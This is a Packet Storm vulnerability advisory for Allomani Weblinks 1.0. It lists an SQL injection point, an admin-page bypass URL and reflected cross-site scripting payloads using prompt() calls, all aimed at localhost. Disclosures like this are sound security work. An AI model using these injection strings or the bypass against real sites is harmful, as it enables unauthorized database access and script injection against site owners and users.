ID PACKETSTORM:128565
Type packetstorm
Reporter indoushka
Modified 2014-10-05T00:00:00
Description
`Allomani Weblinks v1.0 Multi Vulnerability
=====================================
Author : indoushka
Vendor : http://www.allomani.com/
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014
برمجة اللوماني للخدمات البرمجية © 2006
======================================
SQL injection :
http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject here)
cpanel : http://127.0.0.1/public_html/admin.php
Bypass :
http://127.0.0.1/public_html/admin_menu.html
Cross site scripting (verified) :
Affected items
/public_html/admin.php
/public_html/go.php
URI was set to "onmouseover='prompt(929220)'bad=">
The input is reflected inside a tag parameter between double quotes.
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>
`
Title Allomani Weblinks 1.0 Cross Site Scripting / SQL Injection
Published 2014-10-05T00:00:00
Source https://packetstormsecurity.com/files/download/128565/allomaniweblinks-sql.txt
Href https://packetstormsecurity.com/files/128565/Allomani-Weblinks-1.0-Cross-Site-Scripting-SQL-Injection.html